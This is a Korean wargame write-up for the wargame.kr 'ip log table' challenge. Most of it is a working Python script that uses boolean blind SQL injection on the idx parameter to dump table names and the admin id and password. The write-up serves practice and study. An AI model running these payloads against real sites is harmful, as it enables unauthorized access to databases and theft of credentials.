ip log table을 누르면 나오는 페이지(/ip_log_table/chk.php)의 idx 파라미터에 blind SQL injection을 하면 된다. MySQL의 if()문을 이용했는데, 조건이 참이면 '2017'이 포함된 행(idx=17122)이 응답에 나오고 거짓이면 나오지 않는 것을 참/거짓 판별 기준으로 삼아 한 글자씩 뽑아냈다.



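import http.client
import string
from urllib import parse
import time  # unused in this script; kept as in the original

# Blind (boolean-based) SQL injection against the wargame.kr "ip log table"
# challenge. Only run this against the challenge host you are authorised to
# attack; every oracle query is a live POST to the target.

# Target and session for the oracle. The Cookie value was redacted by the
# author ("XXXX"); paste a valid session cookie here before running.
HOST = 'wargame.kr:8080'
PATH = '/ip_log_table/chk.php'
COOKIE = 'XXXX'

# Row idx used as the "true" branch of the injected IF(). Presumably its row
# renders with a '2017' timestamp, which is what blind() looks for -- confirm
# against the live page before reusing this value.
TRUE_IDX = 17122

# Candidate characters tried at each position, in this order. Anything outside
# this set (e.g. '`', '{', '}', '|', space, non-ASCII) cannot be recovered and
# shows up as a gap; extend it if the dump looks truncated.
CHARSET = '~!@#$%^&*()-,.[]_0123456789' + string.ascii_letters
char = CHARSET  # original name, kept for anything that referenced it


def blind(q, host=HOST, path=PATH, cookie=COOKIE):
    """Send *q* as the POST ``idx`` parameter and return the oracle verdict.

    The target interpolates ``idx`` into its query, so *q* is an SQL fragment
    (here always ``if(<cond>, TRUE_IDX, 0)``). The response is treated as
    "true" when it contains ``b'2017'``, i.e. the TRUE_IDX row was rendered.

    Args:
        q: SQL fragment to inject as ``idx``.
        host, path, cookie: target details; defaults are the module constants.

    Returns:
        True when the injected condition held, False otherwise.

    Raises:
        OSError / http.client.HTTPException when the request fails.
    """
    con = http.client.HTTPConnection(host)
    try:
        head = {
            'Content-type': 'application/x-www-form-urlencoded',
            'Accept': 'text/plain',
            'Cookie': cookie,
        }
        params = parse.urlencode({'idx': q})
        con.request('POST', path, params, headers=head)
        res = con.getresponse().read()
        # print(res)
        return b'2017' in res
    finally:
        # the original never closed the connection, leaking one socket per query
        con.close()


def table_payload(pos, idx, ch):
    """Return the IF() fragment that is true when character *pos* (1-based)
    of the *idx*-th base table name (0-based LIMIT offset) equals *ch*."""
    return (
        'if((select ascii(substr(table_name,{},1)) from information_schema.tables '
        'where table_type=0x62617365207461626c65 limit {},1)={},{},0)'
    ).format(pos, idx, ord(ch), TRUE_IDX)


def column_payload(col, pos, ch):
    """Return the IF() fragment that is true when character *pos* (1-based)
    of ``admin_table.<col>`` equals *ch*.

    Note: the subquery has no LIMIT, so it assumes admin_table holds a single
    row (as the author's run found); a multi-row table would make it error.
    """
    return 'if((select ascii(substr({},{},1)) from admin_table)={},{},0)'.format(
        col, pos, ord(ch), TRUE_IDX)


def _extract(make_query, max_len, charset=CHARSET):
    """Recover up to *max_len* characters one position at a time.

    *make_query(pos, ch)* must return the SQL fragment that is true when the
    character at *pos* equals *ch*. A position with no matching candidate is
    either past the end of the string or a character outside *charset*; the
    original silently skipped such positions, so a note is printed instead.
    """
    ans = ''
    for pos in range(1, max_len + 1):
        for ch in charset:
            if blind(make_query(pos, ch)):
                ans += ch
                print('[*]find ' + ans)
                break
        else:
            print('[!]no match at position {} (end of string or char outside CHARSET)'.format(pos))
    return ans


def table_find(indices=range(1, 2), max_len=11):
    """Dump base-table names from information_schema, one per LIMIT offset.

    Defaults reproduce the author's run: only offset 1 (the second table),
    scanned for up to 11 positions. Pass ``indices=range(0, 2)`` to recover
    both tables the author found.
    """
    for idx in indices:
        ans = _extract(lambda pos, ch, idx=idx: table_payload(pos, idx, ch), max_len)
        print('[**]table_name ' + ans)


def idps_find(obj, max_len=10):
    """Dump column *obj* ('id' or 'ps') of admin_table, up to *max_len* chars.

    The author's notes say both columns are 10 characters long, but the
    original loop (range(1, 10)) only covered 9 positions and dropped the last
    character; the default is now 10.
    """
    ans = _extract(lambda pos, ch: column_payload(obj, pos, ch), max_len)
    print('[**]' + obj + ' ' + ans)


if __name__ == '__main__':
    # table count = 2, probed by hand with (offset 2 is empty):
    # if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit 2,1)>0,17122,0)
    # first table length = 11, second table length = 8
    table_find()
    # table names: admin_table, ip_table
    # admin_table id length = 10, ps length = 10
    idps_find('id')
    idps_find('ps')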

